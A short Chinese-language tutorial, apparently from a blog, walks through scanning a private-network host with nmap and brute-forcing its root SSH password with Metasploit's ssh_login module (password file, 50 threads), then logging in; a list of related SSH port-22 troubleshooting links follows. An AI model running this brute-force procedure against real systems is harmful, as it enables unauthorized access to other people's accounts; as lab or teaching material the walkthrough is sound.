-
在终端中输入命令“nmap 192.168.1.3”,对目标主机进行端口扫描,发现主机开放22端口;
-
在终端中输入命令“msfconsole”,启动MSF终端
-
在终端中输入命令“search ssh_login”,搜索ssh_login的相关工具和攻击载荷;
-
在终端中输入命令“use auxiliary/scanner/ssh/ssh_login”,启用漏洞利用模块, 提示符就会提示进入到该路径下;
-
在终端中输入命令“show options”,查看需要设置的相关项,“yes”表示必须填写的参数;
-
在终端中输入命令“set RHOST 192.168.1.3”,设置目标主机的IP地址;
-
在终端中输入“set USERNAME root”,指定登陆用户名root;
-
在终端中输入“set PASS_FILE /home/passwd.txt”,设置暴利破解的密码文件路径;
-
在终端中输入“set THREADS 50”,设置暴利破解的线程数为50;
-
在终端中输入“run”,开始向目标主机爆破ssh的登陆帐号和密码,如果爆破成功,就会显示登陆帐号为root,密码为Xxx;
-
在终端中输入“ssh root@192.168.1.3”,连接目标主机;
相关文章
- 01-31ssh scp ssh-copy-id 非22端口的操作方法
- 01-31msf ssh prot:22
- 01-31Git拉取代码报:ssh_dispatch_run_fatal: Connection to *** port 22: message authentication code incorrect
- 01-31【git 端口拒绝解决方案】ssh: connect to host github.com port 22: Connection refused
- 01-31Git拉取代码报:ssh_dispatch_run_fatal: Connection to *** port 22: message authentication code incorrect
- 01-31window下 配置gitlab ssh非端口22端口
- 01-31[ssh]ssh: connect to host xxx.xxx.xxx.xxx port 22:Connection refused
- 01-31关于启动HBASE自带的zookeeper报ssh:connect to host localhost port 22: Connection refused的问题
- 01-31ssh: connect to host localhost port 22: Connection refused !
- 01-31scp ssh: connect to host 192.168.6.129 port 22: Connection refused lost connection